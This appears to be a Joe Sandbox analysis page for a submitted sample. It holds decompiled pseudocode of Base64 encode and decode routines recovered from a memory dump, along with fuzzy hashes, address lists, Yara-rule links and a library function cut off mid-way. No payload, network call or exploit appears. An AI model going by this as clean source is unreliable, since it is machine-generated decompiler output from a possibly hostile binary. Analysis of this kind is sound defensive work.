Instruction ID: 29efd7cd1e88fcbd65e1ce506d49766d70152302ec2d9c9148e50b83c0ac6557
Opcode Fuzzy Hash: cbcc6e2a6f2c4259a50ccd72fc90bada03a2d2b91490835a7e3c066ac25c692b
Instruction Fuzzy Hash: AE715170E142458FEF108FAC94807EEFBE9EB19318F4401BDEA5597382C375884ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01310610, Relevance: .2, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E01310610(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v17;
				unsigned char _v18;
				signed char _v20;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t64;
				signed int _t65;
				signed int _t66;
				signed char _t67;
				intOrPtr* _t73;
				void* _t76;
				intOrPtr* _t77;
				char _t78;
				signed int _t79;
				signed int _t80;
				signed char _t81;
				intOrPtr _t87;
				intOrPtr* _t89;
				void* _t92;
				intOrPtr _t93;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t113;
				unsigned char _t126;
				unsigned char _t133;
				intOrPtr _t136;
				void* _t138;
				void* _t139;
				void* _t142;
				intOrPtr _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t150;
				void* _t151;
				void* _t152;

				_t121 = __edx;
				_push(0xffffffff);
				_push(0x136586e);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x24;
				_t59 =  *0x13a4018; // 0x39cca9f6
				_push(_t59 ^ _t150);
				 *[fs:0x0] =  &_v16;
				_t89 = __edx;
				_v44 = __edx;
				_t62 = __ecx;
				_v32 = __ecx;
				_v36 = __ecx;
				_v52 = __ecx;
				_t144 = 0;
				_v40 = 0;
				_t136 = 0;
				_t97 =  *((intOrPtr*)(__edx + 0x10));
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				_v8 = 0;
				_v40 = 1;
				if(_t97 == 0) {
					L36:
					 *[fs:0x0] = _v16;
					return _t62;
				} else {
					while(1) {
						_t63 = _t89;
						_v36 = _t97 - 1;
						_t101 =  *((intOrPtr*)(_t89 + 0x14));
						if(_t101 >= 0x10) {
							_t63 =  *_t89;
						}
						if( *((char*)(_t63 + _t136)) == 0x3d) {
							break;
						}
						_t73 = _t89;
						if(_t101 >= 0x10) {
							_t73 =  *_t89;
						}
						_t74 =  *((intOrPtr*)(_t73 + _t136));
						_v25 =  *((intOrPtr*)(_t73 + _t136));
						_t76 = E01349C70(_t89, _t101, _t121, _t74 & 0x000000ff);
						_t152 = _t152 + 4;
						if(_t76 != 0) {
							L9:
							_t77 = _t89;
							if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
								_t77 =  *_t89;
							}
							_t78 =  *((intOrPtr*)(_t77 + _t136));
							_t136 = _t136 + 1;
							 *((char*)(_t150 + _t144 - 0x10)) = _t78;
							_t144 = _t144 + 1;
							_v48 = _t136;
							if(_t144 == 4) {
								_t113 =  *0x13a60ac; // 0x0
								_t148 = 0;
								do {
									_t79 =  *(_t150 + _t148 - 0x10);
									_t142 =  >=  ?  *0x13a609c : 0x13a609c;
									if(_t113 == 0) {
										L16:
										_t80 = _t79 | 0xffffffff;
									} else {
										_t79 = E01347A30(0x13a609c, _t79, _t113);
										_t152 = _t152 + 0xc;
										if(_t79 == 0) {
											goto L16;
										} else {
											_t80 = _t79 - 0x13a609c;
										}
									}
									_t113 =  *0x13a60ac; // 0x0
									 *(_t150 + _t148 - 0x10) = _t80;
									_t148 = _t148 + 1;
								} while (_t148 < 4);
								_t81 = _v20;
								_t95 = _v32;
								_v24 = (_t81 >> 0x00000004 & 0x00000003) + (_t81 << 2);
								_t133 = _v18;
								_t121 = (_t133 << 6) + _v17;
								_v22 = (_t133 << 6) + _v17;
								_t149 = 0;
								_v23 = (_t133 >> 0x00000002 & 0x0000000f) + (_t81 << 4);
								do {
									E012FC280(_t95, _t95, _t142, _t149,  *(_t150 + _t149 - 0x14) & 0x000000ff);
									_t149 = _t149 + 1;
								} while (_t149 < 3);
								_t89 = _v44;
								_t144 = 0;
								_t136 = _v48;
							}
							_t97 = _v36;
							if(_t97 != 0) {
								continue;
							}
						} else {
							_t87 = _v25;
							if(_t87 == 0x2b || _t87 == 0x2f) {
								goto L9;
							}
						}
						break;
					}
					if(_t144 == 0) {
						L35:
						_t62 = _v32;
						goto L36;
					} else {
						_t64 = _t144;
						if(_t144 < 4) {
							do {
								 *((char*)(_t150 + _t64 - 0x10)) = 0;
								_t64 = _t64 + 1;
							} while (_t64 < 4);
						}
						_t102 =  *0x13a60ac; // 0x0
						_t138 = 0;
						do {
							_t65 =  *(_t150 + _t138 - 0x10);
							_t92 =  >=  ?  *0x13a609c : 0x13a609c;
							if(_t102 == 0) {
								L29:
								_t66 = _t65 | 0xffffffff;
							} else {
								_t65 = E01347A30(0x13a609c, _t65, _t102);
								_t152 = _t152 + 0xc;
								if(_t65 == 0) {
									goto L29;
								} else {
									_t66 = _t65 - _t92;
								}
							}
							_t102 =  *0x13a60ac; // 0x0
							 *(_t150 + _t138 - 0x10) = _t66;
							_t138 = _t138 + 1;
						} while (_t138 < 4);
						_t67 = _v20;
						_t46 = _t144 - 1; // -1
						_t139 = _t46;
						_v24 = (_t67 >> 0x00000004 & 0x00000003) + (_t67 << 2);
						_t146 = 0;
						_t126 = _v18;
						_v22 = (_t126 << 6) + _v17;
						_v23 = (_t126 >> 0x00000002 & 0x0000000f) + (_t67 << 4);
						if(_t139 == 0) {
							goto L35;
						} else {
							_t93 = _v32;
							do {
								E012FC280(_t93, _t93, _t139, _t146,  *(_t150 + _t146 - 0x14) & 0x000000ff);
								_t146 = _t146 + 1;
							} while (_t146 < _t139);
							 *[fs:0x0] = _v16;
							return _t93;
						}
					}
				}
			}

0x01310610
0x01310613
0x01310615
0x01310620
0x01310621
0x01310627
0x0131062e
0x01310632
0x01310638
0x0131063a
0x0131063d
0x0131063f
0x01310642
0x01310645
0x01310648
0x0131064a
0x01310651
0x01310653
0x01310656
0x01310659
0x01310660
0x01310663
0x01310666
0x0131066f
0x0131086c
0x0131086f
0x0131087d
0x01310675
0x01310675
0x01310676
0x01310678
0x0131067b
0x01310681
0x01310683
0x01310683
0x01310689
0x00000000
0x00000000
0x0131068f
0x01310694
0x01310696
0x01310696
0x01310698
0x0131069b
0x013106a2
0x013106a7
0x013106ac
0x013106bd
0x013106c1
0x013106c3
0x013106c5
0x013106c5
0x013106c7
0x013106ca
0x013106cb
0x013106cf
0x013106d0
0x013106d6
0x013106dc
0x013106e2
0x013106f0
0x013106fc
0x01310700
0x01310709
0x01310721
0x01310721
0x0131070b
0x01310711
0x01310716
0x0131071b
0x00000000
0x0131071d
0x0131071d
0x0131071d
0x0131071b
0x01310724
0x0131072a
0x0131072e
0x0131072f
0x01310734
0x01310739
0x0131074e
0x01310751
0x01310759
0x01310762
0x01310767
0x01310769
0x01310770
0x01310778
0x0131077d
0x0131077e
0x01310783
0x01310786
0x01310788
0x01310788
0x0131078b
0x01310790
0x00000000
0x00000000
0x013106ae
0x013106ae
0x013106b3
0x00000000
0x00000000
0x013106b3
0x00000000
0x013106ac
0x01310798
0x01310869
0x01310869
0x00000000
0x0131079e
0x0131079e
0x013107a3
0x013107a5
0x013107a5
0x013107aa
0x013107ab
0x013107a5
0x013107b0
0x013107b6
0x013107c0
0x013107cc
0x013107d0
0x013107d9
0x013107f1
0x013107f1
0x013107db
0x013107e1
0x013107e6
0x013107eb
0x00000000
0x013107ed
0x013107ed
0x013107ed
0x013107eb
0x013107f4
0x013107fa
0x013107fe
0x013107ff
0x01310804
0x01310807
0x01310807
0x0131081e
0x01310821
0x01310823
0x01310834
0x01310839
0x0131083e
0x00000000
0x01310840
0x01310840
0x01310843
0x0131084b
0x01310850
0x01310851
0x0131085a
0x01310868
0x01310868
0x0131083e
0x01310798

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d062aab1b6eda2098738122e52ad40e11fbd4910238e4122b8baf69e86160a0
Instruction ID: a1e64b20368b271ded4ccc1189a55ee58da993a7a82d4bd6453c89c29cfbd847
Opcode Fuzzy Hash: 5d062aab1b6eda2098738122e52ad40e11fbd4910238e4122b8baf69e86160a0
Instruction Fuzzy Hash: 607133B5E082448FEB19CF6C94807FEBFF6EB59314F4505A9E85597382C335894ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01310430, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E01310430(intOrPtr __ecx, signed char __edx, intOrPtr _a4, signed char _a7) {
				char _v8;
				char _v16;
				signed char _v17;
				void* _v18;
				intOrPtr _v20;
				intOrPtr _v21;
				unsigned char _v22;
				void* _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed char _v27;
				unsigned char _v28;
				char _v29;
				char _v32;
				signed char _v36;
				intOrPtr _v40;
				signed char _v48;
				intOrPtr _v52;
				intOrPtr _v64;
				char _v72;
				signed char _v88;
				signed char _v92;
				char _v96;
				signed char _v100;
				signed char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t104;
				intOrPtr _t110;
				signed char _t117;
				signed int _t124;
				signed char _t127;
				signed char _t128;
				intOrPtr _t129;
				signed int _t130;
				signed int _t131;
				signed char _t132;
				signed char _t138;
				void* _t141;
				signed char _t142;
				char _t143;
				signed int _t144;
				signed int _t145;
				signed char _t146;
				intOrPtr _t152;
				signed char _t156;
				unsigned char _t159;
				intOrPtr _t164;
				void* _t166;
				void* _t168;
				signed char _t169;
				void* _t172;
				signed char _t173;
				signed char _t175;
				signed char _t180;
				signed char _t185;
				intOrPtr _t191;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t207;
				signed char _t216;
				signed char _t218;
				unsigned char _t228;
				unsigned char _t234;
				unsigned char _t241;
				intOrPtr _t244;
				intOrPtr _t246;
				void* _t248;
				void* _t249;
				void* _t252;
				intOrPtr _t254;
				signed char _t256;
				intOrPtr _t257;
				void* _t259;
				void* _t261;
				void* _t262;
				void* _t263;
				signed int _t264;
				signed int _t265;
				void* _t266;
				signed int _t267;
				void* _t268;
				void* _t277;

				_t227 = __edx;
				_push(0xffffffff);
				_push(0x136780e);
				_push( *[fs:0x0]);
				_t267 = _t266 - 0x18;
				_t104 =  *0x13a4018; // 0x39cca9f6
				_push(_t104 ^ _t264);
				 *[fs:0x0] =  &_v16;
				_t244 = __ecx;
				_v40 = __ecx;
				_v32 = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				_v8 = 0;
				_t254 = 0;
				_t164 = _a4;
				_v32 = 1;
				if(_t164 == 0) {
					L20:
					 *[fs:0x0] = _v16;
					return _t244;
				} else {
					do {
						_t164 = _t164 - 1;
						 *((char*)(_t264 + _t254 - 0x14)) =  *_t227;
						_t227 = _t227 + 1;
						_t254 = _t254 + 1;
						_t180 = _v24;
						_v36 = _t227;
						_v18 = _v22;
						_a7 = _t180;
						_v17 = _t180;
						if(_t254 == 3) {
							_t216 = _t180 & 0x00000003;
							_v28 = _t180 >> 2;
							_t156 = _t216 >> 4;
							_t218 = (_t216 << 4) + _t156;
							_v27 = _t218;
							_t159 = (_t156 & 0x0000003f) >> 6;
							_v25 = _t159;
							_t263 = 0;
							_v26 = ((_t218 & 0x0000000f) << 2) + _t159;
							asm("o16 nop [eax+eax]");
							do {
								_t224 =  >=  ?  *0x13a609c : 0x13a609c;
								E012FC280(_t164, _t244, _t244, _t263,  *(( *(_t264 + _t263 - 0x18) & 0x000000ff) + ( >=  ?  *0x13a609c : 0x13a609c)) & 0x000000ff);
								_t263 = _t263 + 1;
							} while (_t263 < 4);
							_t227 = _v36;
							_t254 = 0;
							_t180 = _v17;
						}
					} while (_t164 != 0);
					_a4 = _t254;
					if(_t254 == 0) {
						goto L20;
					} else {
						_t110 = _t254;
						if(_t254 >= 3) {
							_t228 = _v18;
							goto L13;
						} else {
							_t277 = _t110 - 3;
							while(_t277 < 0) {
								 *((char*)(_t264 + _t110 - 0x14)) = 0;
								_t110 = _t110 + 1;
								if(_t110 < 3) {
									continue;
								} else {
									_t228 = _v22;
									_t180 = _v24;
									L13:
									_t166 = 0;
									_v28 = _t180 >> 2;
									_t185 = ((_t180 & 3) << 4) + ((_t180 & 0x00000003) >> 4) << 2;
									_v27 = _t185;
									_v25 = _t228 & 0x0000003f;
									_t38 = _t254 + 1; // 0x2
									_t117 = _t38;
									_v26 = _t185 + (_t228 >> 6);
									_v36 = _t117;
									if(_t117 > 0) {
										_t256 = _t117;
										do {
											_t189 =  >=  ?  *0x13a609c : 0x13a609c;
											E012FC280(_t166, _t244, _t244, _t256,  *(( *(_t264 + _t166 - 0x18) & 0x000000ff) + ( >=  ?  *0x13a609c : 0x13a609c)) & 0x000000ff);
											_t166 = _t166 + 1;
										} while (_t166 < _t256);
										_t254 = _a4;
									}
									if(_t254 < 3) {
										_t168 = 3 - _t254;
										do {
											E012FC280(_t168, _t244, _t244, _t254, 0x3d);
											_t168 = _t168 - 1;
										} while (_t168 != 0);
									}
									goto L20;
								}
								goto L59;
							}
							E0132EC0C();
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t264);
							_t265 = _t267;
							_push(0xffffffff);
							_push(0x136586e);
							_push( *[fs:0x0]);
							_t268 = _t267 - 0x24;
							_push(_t164);
							_push(_t254);
							_push(_t244);
							_t124 =  *0x13a4018; // 0x39cca9f6
							_push(_t124 ^ _t265);
							 *[fs:0x0] =  &_v72;
							_t169 = _t227;
							_v100 = _t169;
							_t127 = _t180;
							_v88 = _t127;
							_v92 = _t127;
							_v108 = _t127;
							_t257 = 0;
							_v96 = 0;
							_t246 = 0;
							_t191 =  *((intOrPtr*)(_t169 + 0x10));
							 *((intOrPtr*)(_t127 + 0x10)) = 0;
							 *((intOrPtr*)(_t127 + 0x14)) = 0xf;
							 *_t127 = 0;
							_v64 = 0;
							_v96 = 1;
							if(_t191 == 0) {
								L58:
								 *[fs:0x0] = _v20;
								return _t127;
							} else {
								while(1) {
									_t128 = _t169;
									_v40 = _t191 - 1;
									_t195 =  *((intOrPtr*)(_t169 + 0x14));
									if(_t195 >= 0x10) {
										_t128 =  *_t169;
									}
									if( *((char*)(_t128 + _t246)) == 0x3d) {
										break;
									}
									_t138 = _t169;
									if(_t195 >= 0x10) {
										_t138 =  *_t169;
									}
									_v29 =  *(_t138 + _t246);
									_t141 = E01349C70(_t169, _t195, _t227,  *(_t138 + _t246) & 0x000000ff);
									_t268 = _t268 + 4;
									if(_t141 != 0) {
										L31:
										_t142 = _t169;
										if( *((intOrPtr*)(_t169 + 0x14)) >= 0x10) {
											_t142 =  *_t169;
										}
										_t143 =  *((intOrPtr*)(_t142 + _t246));
										_t246 = _t246 + 1;
										 *((char*)(_t265 + _t257 - 0x10)) = _t143;
										_t257 = _t257 + 1;
										_v52 = _t246;
										if(_t257 == 4) {
											_t207 =  *0x13a60ac; // 0x0
											_t261 = 0;
											do {
												_t144 =  *(_t265 + _t261 - 0x10);
												_t252 =  >=  ?  *0x13a609c : 0x13a609c;
												if(_t207 == 0) {
													L38:
													_t145 = _t144 | 0xffffffff;
												} else {
													_t144 = E01347A30(0x13a609c, _t144, _t207);
													_t268 = _t268 + 0xc;
													if(_t144 == 0) {
														goto L38;
													} else {
														_t145 = _t144 - 0x13a609c;
													}
												}
												_t207 =  *0x13a60ac; // 0x0
												 *(_t265 + _t261 - 0x10) = _t145;
												_t261 = _t261 + 1;
											} while (_t261 < 4);
											_t146 = _v24;
											_t175 = _v36;
											_v28 = (_t146 >> 0x00000004 & 0x00000003) + (_t146 << 2);
											_t241 = _v22;
											_t227 = (_t241 << 6) + _v21;
											_v26 = (_t241 << 6) + _v21;
											_t262 = 0;
											_v27 = (_t241 >> 0x00000002 & 0x0000000f) + (_t146 << 4);
											do {
												E012FC280(_t175, _t175, _t252, _t262,  *(_t265 + _t262 - 0x14) & 0x000000ff);
												_t262 = _t262 + 1;
											} while (_t262 < 3);
											_t169 = _v48;
											_t257 = 0;
											_t246 = _v52;
										}
										_t191 = _v40;
										if(_t191 != 0) {
											continue;
										}
									} else {
										_t152 = _v29;
										if(_t152 == 0x2b || _t152 == 0x2f) {
											goto L31;
										}
									}
									break;
								}
								if(_t257 == 0) {
									L57:
									_t127 = _v36;
									goto L58;
								} else {
									_t129 = _t257;
									if(_t257 < 4) {
										do {
											 *((char*)(_t265 + _t129 - 0x10)) = 0;
											_t129 = _t129 + 1;
										} while (_t129 < 4);
									}
									_t196 =  *0x13a60ac; // 0x0
									_t248 = 0;
									do {
										_t130 =  *(_t265 + _t248 - 0x10);
										_t172 =  >=  ?  *0x13a609c : 0x13a609c;
										if(_t196 == 0) {
											L51:
											_t131 = _t130 | 0xffffffff;
										} else {
											_t130 = E01347A30(0x13a609c, _t130, _t196);
											_t268 = _t268 + 0xc;
											if(_t130 == 0) {
												goto L51;
											} else {
												_t131 = _t130 - _t172;
											}
										}
										_t196 =  *0x13a60ac; // 0x0
										 *(_t265 + _t248 - 0x10) = _t131;
										_t248 = _t248 + 1;
									} while (_t248 < 4);
									_t132 = _v24;
									_t91 = _t257 - 1; // -1
									_t249 = _t91;
									_v28 = (_t132 >> 0x00000004 & 0x00000003) + (_t132 << 2);
									_t259 = 0;
									_t234 = _v22;
									_v26 = (_t234 << 6) + _v21;
									_v27 = (_t234 >> 0x00000002 & 0x0000000f) + (_t132 << 4);
									if(_t249 == 0) {
										goto L57;
									} else {
										_t173 = _v36;
										do {
											E012FC280(_t173, _t173, _t249, _t259,  *(_t265 + _t259 - 0x14) & 0x000000ff);
											_t259 = _t259 + 1;
										} while (_t259 < _t249);
										 *[fs:0x0] = _v20;
										return _t173;
									}
								}
							}
						}
					}
				}
				L59:
			}

0x01310430
0x01310433
0x01310435
0x01310440
0x01310441
0x01310447
0x0131044e
0x01310452
0x01310458
0x0131045a
0x0131045d
0x01310464
0x0131046b
0x01310472
0x01310475
0x0131047c
0x0131047e
0x01310481
0x0131048a
0x013105ee
0x013105f3
0x01310601
0x01310490
0x01310490
0x01310492
0x01310493
0x01310497
0x0131049b
0x0131049f
0x013104a2
0x013104a5
0x013104a8
0x013104ab
0x013104b1
0x013104b5
0x013104bb
0x013104c3
0x013104c6
0x013104ca
0x013104d2
0x013104d8
0x013104e0
0x013104e2
0x013104e5
0x013104f0
0x01310501
0x0131050f
0x01310514
0x01310515
0x0131051a
0x0131051d
0x01310522
0x01310522
0x01310525
0x0131052d
0x01310532
0x00000000
0x01310538
0x01310538
0x0131053d
0x0131055e
0x00000000
0x0131053f
0x0131053f
0x01310542
0x01310548
0x0131054d
0x01310551
0x00000000
0x01310553
0x01310553
0x01310559
0x01310561
0x01310563
0x0131056b
0x0131057b
0x01310580
0x0131058b
0x0131058e
0x0131058e
0x01310591
0x01310594
0x01310599
0x0131059b
0x013105a0
0x013105b1
0x013105bf
0x013105c4
0x013105c5
0x013105c9
0x013105c9
0x013105cf
0x013105d6
0x013105e0
0x013105e4
0x013105e9
0x013105e9
0x013105e0
0x00000000
0x013105cf
0x00000000
0x01310551
0x01310602
0x01310607
0x01310608
0x01310609
0x0131060a
0x0131060b
0x0131060c
0x0131060d
0x0131060e
0x0131060f
0x01310610
0x01310611
0x01310613
0x01310615
0x01310620
0x01310621
0x01310624
0x01310625
0x01310626
0x01310627
0x0131062e
0x01310632
0x01310638
0x0131063a
0x0131063d
0x0131063f
0x01310642
0x01310645
0x01310648
0x0131064a
0x01310651
0x01310653
0x01310656
0x01310659
0x01310660
0x01310663
0x01310666
0x0131066f
0x0131086c
0x0131086f
0x0131087d
0x01310675
0x01310675
0x01310676
0x01310678
0x0131067b
0x01310681
0x01310683
0x01310683
0x01310689
0x00000000
0x00000000
0x0131068f
0x01310694
0x01310696
0x01310696
0x0131069b
0x013106a2
0x013106a7
0x013106ac
0x013106bd
0x013106c1
0x013106c3
0x013106c5
0x013106c5
0x013106c7
0x013106ca
0x013106cb
0x013106cf
0x013106d0
0x013106d6
0x013106dc
0x013106e2
0x013106f0
0x013106fc
0x01310700
0x01310709
0x01310721
0x01310721
0x0131070b
0x01310711
0x01310716
0x0131071b
0x00000000
0x0131071d
0x0131071d
0x0131071d
0x0131071b
0x01310724
0x0131072a
0x0131072e
0x0131072f
0x01310734
0x01310739
0x0131074e
0x01310751
0x01310759
0x01310762
0x01310767
0x01310769
0x01310770
0x01310778
0x0131077d
0x0131077e
0x01310783
0x01310786
0x01310788
0x01310788
0x0131078b
0x01310790
0x00000000
0x00000000
0x013106ae
0x013106ae
0x013106b3
0x00000000
0x00000000
0x013106b3
0x00000000
0x013106ac
0x01310798
0x01310869
0x01310869
0x00000000
0x0131079e
0x0131079e
0x013107a3
0x013107a5
0x013107a5
0x013107aa
0x013107ab
0x013107a5
0x013107b0
0x013107b6
0x013107c0
0x013107cc
0x013107d0
0x013107d9
0x013107f1
0x013107f1
0x013107db
0x013107e1
0x013107e6
0x013107eb
0x00000000
0x013107ed
0x013107ed
0x013107ed
0x013107eb
0x013107f4
0x013107fa
0x013107fe
0x013107ff
0x01310804
0x01310807
0x01310807
0x0131081e
0x01310821
0x01310823
0x01310834
0x01310839
0x0131083e
0x00000000
0x01310840
0x01310840
0x01310843
0x0131084b
0x01310850
0x01310851
0x0131085a
0x01310868
0x01310868
0x0131083e
0x01310798
0x0131066f
0x0131053d
0x01310532
0x00000000

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e643feef67ff9d62030ca718be8f28d8b06f49a201123bdd244a7e09c79412f7
Instruction ID: 66781c6cae75d80287b81111c11462eacdac84bdc4d886daac89dffe8cf48b14
Opcode Fuzzy Hash: e643feef67ff9d62030ca718be8f28d8b06f49a201123bdd244a7e09c79412f7
Instruction Fuzzy Hash: 55512576D0819A8FEB168FA880617FFFFB8EB16304F0501ADD9949B383C6648645C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01347A30, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: bf0735df39a8280c8f81db1da3be7fda03d986f5a57243ee0adccbcf9051d48c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0C11EB7724018247F614CABDD8B85B6BFD5EBC522972D837AD2418B754D322F3459600

Uniqueness

Uniqueness Score: -1.00%

Function 013565AB, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d0e582e92355af6a241f80d7c67032be0aa087ad7d929074014bd9431085a3
Instruction ID: aeb07f8703162b109c655adbeafed4b324b66cbc6605a158ea0be169c0f503d1
Opcode Fuzzy Hash: f7d0e582e92355af6a241f80d7c67032be0aa087ad7d929074014bd9431085a3
Instruction Fuzzy Hash: 57F0A972A50220EFCF22CA4CC406E8CB3ACEB04B28F91049AE901EB245C6B0DE00C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 013565EF, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction ID: 5218c73ce04673d435299f88e911270f10bc22bbce990f2c809417d84baf21e2
Opcode Fuzzy Hash: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction Fuzzy Hash: E8E08C72911268EBCB94DB8CCA04D8AF7ECEB44E18B51059ABA01D3200C270DE01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01318329, Relevance: 36.3, APIs: 24, Instructions: 341
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 48%

			E01318329(void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr* _v48;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t88;
				void* _t147;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t189;
				intOrPtr* _t192;
				intOrPtr _t193;
				intOrPtr* _t223;
				void* _t244;
				intOrPtr _t245;
				void* _t247;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				intOrPtr* _t251;
				intOrPtr* _t252;
				intOrPtr _t255;
				intOrPtr _t256;
				void* _t260;
				intOrPtr* _t262;
				intOrPtr* _t263;
				intOrPtr* _t264;
				intOrPtr* _t265;
				void* _t266;
				void* _t279;
				void* _t280;
				void* _t285;

				_t279 = _t285;
				_t189 = _a4;
				_t244 = _t189 + 1;
				do {
					_t88 =  *_t189;
					_t189 = _t189 + 1;
				} while (_t88 != 0);
				_push(1);
				_t247 = _t189 - _t244 + 1;
				_t260 = E0134B4B6();
				_t192 = _t247;
				if(_t260 == 0) {
					E01316BCF(__eflags);
					asm("int3");
					_push(_t279);
